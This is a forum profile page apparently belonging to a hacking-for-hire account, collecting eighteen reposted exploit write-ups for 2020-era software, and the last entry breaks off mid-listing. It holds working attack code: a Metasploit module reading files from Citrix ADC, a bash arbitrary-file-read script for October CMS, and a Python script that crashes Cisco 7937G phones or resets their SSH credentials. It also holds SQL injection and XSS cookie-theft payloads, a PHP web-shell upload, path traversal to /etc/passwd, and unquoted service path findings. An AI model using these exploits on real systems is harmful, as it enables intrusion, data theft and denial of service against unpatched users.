Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Citrix ADC NetScaler - Local File Inclusion (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize(info = {}) super(update_info(info, 'Name' => 'Citrix ADC NetScaler - Local File Inclusion (Metasploit)', 'Description' => %{ The remote device is affected by multiple vulnerabilities. An authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices. An unauthenticated remote attacker with access to the `NSIP/management interface` can exploit this to bypass authorization (CVE-2020-8193). And Information disclosure (CVE-2020-8195 and CVE-2020-8196) - but at this time unclear which. }, 'Author' => [ 'Donny Maasland', # Discovery 'mekhalleh (RAMELLA Sébastien)' # Module author (Zeop Entreprise) ], 'References' => [ ['CVE', '2020-8193'], ['CVE', '2020-8195'], ['CVE', '2020-8196'], ['URL', 'https://dmaasland.github.io/posts/citrix.html'], ['URL', 'https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/'], ['URL', 'https://github.com/jas502n/CVE-2020-8193'] ], 'DisclosureDate' => '2020-07-09', 'License' => MSF_LICENSE, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true } )) register_options([ OptEnum.new('MODE', [true, 'Start type.', 'discovery', [ 'discovery', 'interactive', 'sessions']]), OptString.new('PATH', [false, 'File or directory you want to read', '/nsconfig/ns.conf']), OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end def create_session params = 'type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1' request = { 'method' => 'POST', 'uri' => "#{normalize_uri(target_uri.path, 'pcidss', 'report')}?#{params}", 'ctype' => 'application/xml', 'headers' => { 'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8), 'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8) }, 'data' => '<appfwprofile><login></login></appfwprofile>' } request = request.merge({'cookie' => @cookie}) if @cookie response = send_request_raw(request) unless response && response.code == 406 print_error("#{@message_prefix} - No response to session request.") return end response.get_cookies end def fix_session_rand response = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'menu', 'ss'), 'cookie' => @cookie, 'vars_get' => { 'sid' => 'nsroot', 'username' => 'nsroot', 'force_setup' => '1' } ) if response && response.code == 302 location = response.headers['location'] response = send_request_cgi( 'method' => 'GET', 'uri' => location, 'cookie' => @cookie ) return unless response && response.code == 200 end response.to_s.scan(/rand = "([^"]+)"/).join end def read_lfi(path, var_rand) params = "filter=path:#{path}" request = { 'method' => 'POST', 'uri' => "#{normalize_uri(target_uri.path, 'rapi', 'filedownload')}?#{params}", 'cookie' => @cookie, 'ctype' => 'application/xml', 'headers' => { 'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8), 'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8), 'rand_key' => var_rand }, 'data' => '<clipermission></clipermission>' } response = send_request_raw(request) end def run_host(ip) proto = (datastore['SSL'] ? 'https' : 'http') @message_prefix = "#{proto}://#{ip}:#{datastore['RPORT']}" @cookie = create_session if @cookie && @cookie =~ /SESSID/ print_status("#{@message_prefix} - Got session: #{@cookie.split(' ')[0]}") var_rand = fix_session_rand unless var_rand print_error("#{@message_prefix} - Unable to get rand value.") return Exploit::CheckCode::Unknown end print_status("#{@message_prefix} - Got rand: #{var_rand}") print_status("#{@message_prefix} - Re-breaking session...") create_session case datastore['MODE'] when /discovery/ response = read_lfi('/etc/passwd'.gsub('/', '%2F'), var_rand) if response.code == 406 if response.body.include? ('root:*:0:0:') print_warning("#{@message_prefix} - Vulnerable.") return Exploit::CheckCode::Vulnerable end end when /interactive/ # TODO: parse response response = read_lfi(datastore['PATH'].gsub('/', '%2F'), var_rand) if response.code == 406 print_line("#{response.body}") end return when /sessions/ # TODO: parse response response = read_lfi('/var/nstmp'.gsub('/', '%2F'), var_rand) if response.code == 406 print_line("#{response.body}") end return end end print_good("#{@message_prefix} - Not Vulnerable.") return Exploit::CheckCode::Safe end end
  2. HireHackking

    DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path # Discovery by: Teresa Q # Discovery Date: 2020-11-11 # Vendor:DigitalPersona U. are U. One Touch # Version: 5.1.0.656 # Vulnerability Type: Unquoted Service Path # Vendor Homepage : https://www.hidglobal.com/crossmatch # Tested on OS: Windows 10 Home x64 es #Analyze PoC : ============== C:\>sc qc "DpHost" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: DpHost TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\DigitalPersona\Bin\DpHostW.exe GRUPO_ORDEN_CARGA : BiometricGroup ETIQUETA : 0 NOMBRE_MOSTRAR : Servicio de autenticación biométrica DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem C:\>
  3. HireHackking

    Touchbase.io 1.10 - Stored Cross Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Touchbase.io 1.10 - Stored Cross Site Scripting #Date: 2020-11-11 #Exploit Author: Simran Sankhala #Vendor Homepage: https://touchbase.ai/ #Software Link: https://touchbase.ai/ #Version: 1.1.0 #Tested on: Windows 10 #Proof Of Concept: touchbase.ai application allows stored XSS, via the 'Add User' module, that is rendered upon 'Contacts' page visit. To exploit this vulnerability: Steps to Reproduce: 1. Login to the application, goto 'Contacts' module and add the user 2. Inject the payload = <marquee onstart=alert(document.cookie)> in the 'Name' field 3. Fill the other details, and save the details. 4. Go to the 'Contacts' module again, and we can see that our entered XSS Script is executed in the name field and the pop-up appears with the session cookie details.
  4. HireHackking

    SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path # Discovery by: Mara Ramirez # Discovery Date: 10-11-2020 # Vendor Homepage: https://www.segurazo.com/download.html # Software Links : https://www.segurazo.com/download.html # Tested Version: 10.0.21.61 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Home Single Languaje # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ SAntivirusIC SAntivirusIC C:\Program Files (x86)\Digital Communications\SAntivirus\SAntivirusIC.exe -service Auto C:\>sc qc SAntivirusIC [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SAntivirusIC TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Digital Communications\SAntivirus\SAntivirusIC.exe -service GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : SAntivirusIC DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  5. HireHackking

    October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: October CMS Build 465 - Arbitrary File Read Exploit (Authenticated) # Date: 2020-03-31 # Exploit Author: Sivanesh Ashok # Vendor Homepage: https://octobercms.com/ # Version: Build 465 and below # Tested on: Windows 10 / XAMPP / October CMS Build 465 # CVE: CVE-2020-5295 echo ''' Authenticated arbitrary file read exploit for October CMS <= Build 465 Tested on: v1.0.45 ''' rm /tmp/ocms_* &> /dev/null if [[ ! `command -v recode` ]]; then echo -e "[!] Missing package 'recode'\n[!] Install 'recode' using the respective command to resume\n\tsudo apt install recode\n\tsudo pacman -S recode\n\tyum install recode" echo -e "[*] Exiting!\n" exit 0 fi read -p "[*] Enter target host (with http/https): " host echo "" read -p "[*] Enter your cookie value: " cookie curl -s -X GET -H "Cookie: $cookie" "$host/backend/cms" > /tmp/ocms_gethtml if [[ ! `awk '/<span class="nav-label">/,/<\/span>/' /tmp/ocms_gethtml | grep "Assets"` ]]; then echo -e "[-] Invalid cookie\n[-] Either the user does not have the privilege to modify assets or the cookie is invalid" echo -e "[*] Exiting!\n" exit 0 fi echo ''' [!] Relative path to the target file is required. eg. config/database.php If you are unsure about the path, check OctoberCMS github which has the default file system hosted https://github.com/octobercms/october ''' read -p "[*] Enter path to the target file: " targetfile themename=`grep "data-item-theme" /tmp/ocms_gethtml -m 1 | awk -F'"' '{print $6}'` csrftoken=`grep "csrf-token" /tmp/ocms_gethtml | awk -F'"' '{print $4}'` curl -s -X POST -H "Cookie: $cookie" -H "X-CSRF-TOKEN: $csrftoken" -H "X-OCTOBER-REQUEST-HANDLER: onOpenTemplate" -H "X-Requested-With: XMLHttpRequest" -d "theme=$themename" -d "type=asset" -d "path=../../../$targetfile" "$host/backend/cms" > /tmp/ocms_jsonres cat /tmp/ocms_jsonres | jq -r '.tab' 2> /dev/null | awk '/<textarea/,/<\/textarea>/' 2> /dev/null | recode html > /tmp/ocms_file 2> /dev/null if [[ `cat /tmp/ocms_file` ]]; then cp /tmp/ocms_file ./october_extractedfile echo -e "\n[+] File saved as ./october_extractedfile!\n" exit 1 else echo -e "\n[-] Error extracting file. Check /tmp/ocms_jsonres for the server response. Exiting!\n" exit 0 fi
  6. HireHackking

    OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure # Date: 11-06-2020 # Vendor Homepage: https://www.journal-theme.com/ # Vendor Changelog: https://docs.journal-theme.com/changelog # Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec) # Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/sql-errors-data-exposure-in-journal-opencart-theme/ # Version: 3.0.46 and below # CVE : CVE-2020-15478 1. Description Journal, the best selling OpenCart theme used in over 25K websites, was found to expose sensitive information and be potentially vulnerable to more attacks such as SQL Injection. Sensitive Data Exposure, an OWASP Top 10 vulnerability, occurs when an application fails to adequately secure sensitive data. The information exposed can include passwords, session tokens, credit card data, private health data, and more. 2. Vulnerability Due to the way the “page” parameter is typecast as an integer in /catalog/controller/journal3/blog.php, if someone enters a string, this results in a detailed error message showing SQL error, database details, and internal path. Such information can help an attacker better prepare their attacks. We see that $page is type casted to an integer using $page = (int)Arr::get($this->request->get, 'page', 1); in the mentioned file. All OpenCart websites using the Journey theme version 3.0.46 and below are affected. 3. Timeline Vulnerability reported to the Journal team – June 11, 2020 Journal Theme version 3.1.0 containing the fix to the vulnerability released – July 1, 2020
  7. HireHackking

    IDT PC Audio 1.0.6425.0 - 'STacSV' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: IDT PC Audio 1.0.6425.0 - 'STacSV' Unquoted Service Path # Discovery by: Isabel Lopez # Software link: https://www.pconlife.com/download/otherfile/20566/098185e9b7c417cf7480bb9f839db652/ # Discovery Date: 2020-11-07 # Tested Version: 1.0.6425.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """ Audio service STacSV c:\Program Files\IDT\WDM\STacSV64.exe Auto # Service info: c:\>sc qc STacSV [SC] QueryServiceConfig SUCCES SERVICE_NAME: STacSV TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : c:\Program Files\IDT\WDM\STacSV64.exe LOAD_ORDER_GROUP : AudioGroup TAG : 0 DISPLAY_NAME : Audio Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  8. HireHackking

    Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated) # Date: 11-14-2020 # Exploit Author: Matthew Aberegg, Alex Prieto # Vendor Homepage: https://pandorafms.com/ # Patch Link: https://github.com/pandorafms/pandorafms/commit/1258a1a63535f60924fb69b1f7812c678570cc8e # Software Link: https://pandorafms.com/community/get-started/ # Version: Pandora FMS 7.0 NG 749 # Tested on: Ubuntu 18.04 # Vulnerability Details # Description : A blind SQL injection vulnerability exists in the "CG Items" functionality of Pandora FMS. # Vulnerable Parameter : data # POC POST /pandora_console/ajax.php?data=(SELECT+1+FROM+(SELECT(SLEEP(5)))A) HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 23 Origin: http://TARGET Connection: close Referer: http://TARGET/pandora_console/index.php?sec=eventos&sec2=operation/events/events Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3 page=general%2Fcg_items
  9. HireHackking

    Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Title: Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path # Author: Jair Amezcua # Date: 2020-11-10 # Vendor Homepage: https://www.iobit.com # Software Link: https://www.iobit.com/es/advancedsystemcarepro.php # Version : 13.0.0.157 # Tested on: Windows 10 64bit(EN) # CVE : N/A # 1. Description: # Unquoted service paths in Advanced System Care Service 13 v13.0.0.157 have an unquoted service path. # PoC =========== C:\>sc qc AdvancedSystemCareService13 [SC] QueryServiceConfig SUCCESS SERVICE_NAME: AdvancedSystemCareService13 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Advanced SystemCare Pro\ASCService.exe LOAD_ORDER_GROUP : System Reserved TAG : 0 DISPLAY_NAME : Advanced SystemCare Service 13 DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Description Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.
  10. HireHackking

    Water Billing System 1.0 - 'id' SQL Injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Water Billing System 1.0 - 'id' SQL Injection (Authenticated) # Date: 2020-11-14 # Exploit Author: Mehmet Kelepçe / Gais Cyber Security # Author ID: 8763 # Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html # Version: 1.0 # Tested on: Apache2 and Windows 10 Vulnerable param: id ------------------------------------------------------------------------- GET /WBS/edituser.php?id=-9%27+UNION+SELECT+1,@@VERSION,3,4--%20- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://localhost/WBS/user.php Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean ------------------------------------------------------------------------- Source Code: edituser.php .. .. .. $user_id =$_REQUEST['id']; $result = mysqli_query($conn,"SELECT * FROM user WHERE id = '$user_id'"); .. .. ------------------------------- Vulnerable param: id ------------------------------------------------------------------------- GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 163 Origin: http://localhost Connection: close Cookie: COOKIE Upgrade-Insecure-Requests: 1 ------------------------------------------------------------------------- Source Code: \WBS\viewbill.php .. .. .. $id =$_REQUEST['id']; $result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'"); .. .. -------------------------------
  11. HireHackking

    KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path # Discovery by: IRVIN GIL # Discovery Date: 2020-11-14 # Vendor Homepage: https://www.kite.com/ # Tested Version: 1.2020.1113.1 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ KiteService KiteService C:\Program Files\Kite\KiteService.exe Auto # Service info: C:\>sc qc "KiteService" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: KiteService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : KiteService DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  12. HireHackking

    Logitech Solar Keyboard Service - 'L4301_Solar' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Title: Logitech Solar Keyboard Service - 'L4301_Solar' Unquoted Service Path # Author: Jair Amezcua # Date: 2020-11-10 # Vendor Homepage: https://www.logitech.com/es-mx # Software Link: https://support.logi.com/hc/en-us/articles/360024692874--Downloads-Wireless-Solar-Keyboard-K750 # Version : 1.10.3.0 # Tested on: Windows 10 64bit(EN) # CVE : N/A # 1. Description: # Unquoted service paths in Logitech Solar Keyboard Service v1.10.3.0 have an unquoted service path. # PoC =========== C:\>sc qc L4301_Solar [SC] QueryServiceConfig SUCCESS SERVICE_NAME: L4301_Solar TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Logitech\SolarApp\L4301_Solar.exe LOAD_ORDER_GROUP : PlugPlay TAG : 0 DISPLAY_NAME : Logitech Solar Keyboard Service DEPENDENCIES : PlugPlay SERVICE_START_NAME : LocalSystem #Description Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.
  13. HireHackking

    User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection # Date: 2020–11–14 # Exploit Author: Mayur Parmar(th3cyb3rc0p) # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: 2.1 # Tested on POPOs(Linux) SQL Injection: SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve some sensitive information, like database structure, tables, columns, and their underlying data. Attack Vector: An attacker can gain admin panel access using malicious sql injection quiries. Steps to reproduce: 1. Open admin login page using following URl: -> http://localhost/loginsystem/admin/ 2. Now put below Payload in both the fields( User ID & Password) Payload: ' or '1'='1 3. Server accepted our payload and we bypassed admin panel without any credentials, IMPACT: if any attacker can gain admin panel access than they can Update & Delete Userdata Suggested Mitigation/Remediation Actions Parameterized queries should be used to separate the command and data portions of the intended query to the database. These queries prevent an attacker from tampering with the query logic and extending a concatenated database query string. Code reviews should be conducted to identify any additional areas were the application or other applications in the organization are vulnerable to this attack. Additionally, input validation should be enforced on the server side in order to ensure that only expected data is sent in queries. Where possible security specific libraries should be used in order to provide an additional layer of protection.
  14. HireHackking

    PMB 5.6 - 'chemin' Local File Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PMB 5.6 - 'chemin' Local File Disclosure # Date: 2020-10-13 # Google Dork: inurl:opac_css # Exploit Author: 41-trk (Tarik Bakir) # Vendor Homepage: http://www.sigb.net # Software Link: http://forge.sigb.net/redmine/projects/pmb/files # Affected versions : <= 5.6 # Tested on: Ubuntu 18.04.1 The PMB Gif Image is not sanitizing the 'chemin', which leads to Local File Disclosure. As of today (2020-10-13) this issue is unfixed. Vulnerable code: (getgif.php ) line 55 $fp2=@fopen($chemin, "rb"); line 68 fpassthru($fp) ========================= Proof-of-Concept =================================================== http://127.0.0.1:2121/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik
  15. HireHackking

    Car Rental Management System 1.0 - Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Car Rental Management System 1.0 - Remote Code Execution (Authenticated) # Date: 2020-11.13 # Exploit Author: Mehmet Kelepçe / Gais Cyber Security # Author ID: 8763 # Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Apache2 - Windows 10 Vulnerable param: img ------------------------------------------------------------------------- POST /car_rental/admin/ajax.php?action=save_settings HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------30709612614161811513297969444 Content-Length: 777 Origin: http://localhost Connection: close Referer: http://localhost/car_rental/admin/index.php?page=site_settings Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean -----------------------------30709612614161811513297969444 Content-Disposition: form-data; name="name" Car Rental Management System -----------------------------30709612614161811513297969444 Content-Disposition: form-data; name="email" info@sample.comm -----------------------------30709612614161811513297969444 Content-Disposition: form-data; name="contact" +6948 8542 623 -----------------------------30709612614161811513297969444 Content-Disposition: form-data; name="about" content -----------------------------30709612614161811513297969444 Content-Disposition: form-data; name="img"; filename="k.php" Content-Type: application/octet-stream <?php echo passthru($_GET['k']);?> -----------------------------30709612614161811513297969444-- Source Code: admin\admin_class.php: -------------------------------------------------------------------- if($_FILES['img']['tmp_name'] != ''){ $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name']; $move = move_uploaded_file($_FILES['img']['tmp_name'],'assets/uploads/'. $fname); $data .= ", avatar = '$fname' "; } -------------------------------------------------------------------- POC: http://{site]/admin/assets/uploads/{FILE}.php?k=whoami
  16. HireHackking

    Atheros Coex Service Application 8.0.0.255 - 'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Atheros Coex Service Application 8.0.0.255 -'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path #Exploit Author : Isabel Lopez #Exploit Date: 2020-11-13 #Vendor Homepage : https://www.file.net/process/ath_coexagent.exe.html #Link Software : https://www.boostbyreason.com/resource-file-9102-ath_coexagent-exe.aspx #Tested on OS: Windows 8.1 (64bits) # 1. Description # Atheros Coex Service Application 8.0.0.255 has an unquoted service path. # 2. PoC C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """" ZAtheros Bt&Wlan Coex Agent ZAtheros Bt&Wlan Coex Agent C:\Program Files (x86)\Bluethooth Suite\Aht_CoexAgent.exe Auto C:\>sc qc WCAssistantService [SC] QueryServiceConfig SUCCES SERVICE_NAME: WCAssistantService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Bluethooth Suite\Aht_CoexAgent.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ZAtheros Bt&Wlan Coex Agent DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  17. HireHackking

    Cisco 7937G - DoS/Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cisco 7937G 1-4-5-7 - DoS/Privilege Escalation # Date: 2020-08-10 # Exploit Author: Cody Martin # Vendor Homepage: https://cisco.com # Version: <=SIP-1-4-5-7 # Tested On: SIP-1-4-5-5, SIP-1-4-5-7 #!/usr/bin/python import sys import getopt import requests import paramiko import socket import os def main(argv): target = "" attack = "" username = "" password = "" divider = "==================== ========================== =" help_text = ''' exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--u= ser username -p/--password password] %s Example: exploit.py -t 192.168.1.200 -a 1 Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password= villa %s Attack types: 1: DoS with automatic device reset 2: DoS without automatic device reset 3: Change SSH credentials of target device ''' % (divider, divider) if len(sys.argv) == 1: print(help_text) sys.exit(2) try: opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target== ", "attack=", "user=", "password="]) except getopt.GetoptError: print(help_text) sys.exit(2) for opt, arg in opts: if opt == "-h": print(help_text) sys.exit() elif opt in ("-t", "--target"): target = arg elif opt in ("-a", "--attack"): attack = arg elif opt in ("-u", "--user"): username = arg elif opt in ("-p", "--password"): password = arg if username != "" and password != "" and attack == "3": print("Starting SSH attack!") print(divider) print("Target: ", target, "\nAttack: ", attack, "\nUser: ", usernam= e, "\nPassword: ", password) finished = attack_ssh(target, username, password) elif attack == "1": print("Starting DoS reset attack!") print(divider) print("Target: ", target, "\nAttack: ", attack) finished = dos_one(target) elif attack == "2": print("Starting DoS non-reset attack!") print(divider) print("Target: ", target, "\nAttack: ", attack) finished = dos_two(target) print(divider) if finished == 1: print("DoS reset attack completed!") elif finished == 2: print("DoS non-reset attack completed!") print("Device must be power cycled to restore functionality.") elif finished == 3: tell = "SSH attack finished!\nTry to login using the supplied cre= dentials %s:%s" % (username, password) connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group= 1-sha1 %s@%s" % (username, target) print(tell) print("You must specify the key exchange when connecting or the dev= ice will be DoS'd!") print(connection_example) elif finished == 0: print("Something strange happened. Attack likely unsuccessful.") sys.exit() def dos_one(target): url = "http://%s/localmenus.cgi" % target data = "A"*46 payload = {"func": "609", "data": data, "rphl": "1"} print("FIRING ZE MIZZLES!") for i in range(1000): try: r = requests.post(url=url, params=payload, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web acces= s is not enabled.") sys.exit() except requests.exceptions.RequestException: return 1 return 0 def dos_two(target): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(15) try: sock.connect((target, 22)) except OSError: print("Device doesn't appear to be functioning (already DoS'd?) or = SSH is not enabled.") sys.exit() transport = paramiko.Transport(sock=sock, disabled_algorithms={"k= ex": ["diffie-hellman-group-exchange-sha1", = "diffie-hellman-group14-sha1", = "diffie-hellman-group1-sha1"]}) fd = os.open("/dev/null", os.O_WRONLY) savefd = os.dup(2) os.dup2(fd, 2) try: transport.connect(username="notreal", password="notreal") except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHExcep= tion): os.dup2(savefd, 2) return 2 return 0 def attack_ssh(target, username, password): url = "http://%s/localmenus.cgi" % target payload_user = {"func": "403", "set": "401", "name1": username, "name= 2": username} payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2"= : password} print("FIRING ZE MIZZLES!") try: r = requests.post(url=url, params=payload_user, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is= not enabled.") sys.exit() r = requests.post(url=url, params=payload_pass, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is= not enabled.") sys.exit() except requests.exceptions.RequestException: print("Device doesn't appear to be functioning or web access is not= enabled.") sys.exit() return 3 if __name__ == "__main__": main(sys.argv[1:])
  18. HireHackking

    Car Rental Management System 1.0 - 'car_id' Sql Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Car Rental Management System 1.0 - 'car_id' Sql Injection # Date: 2020-11.13 # Exploit Author: Mehmet Kelepçe / Gais Cyber Security # Author ID: 8763 # Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Apache2 - Windows 10 Vulnerable param: car_id ------------------------------------------------------------------------- GET /car_rental/booking.php?car_id=1+UNION+ALL+SELECT+1,@@VERSION,3,4,5,6,7,8,9,10# HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Source Code: booking.php: -------------------------------------------------------------------- 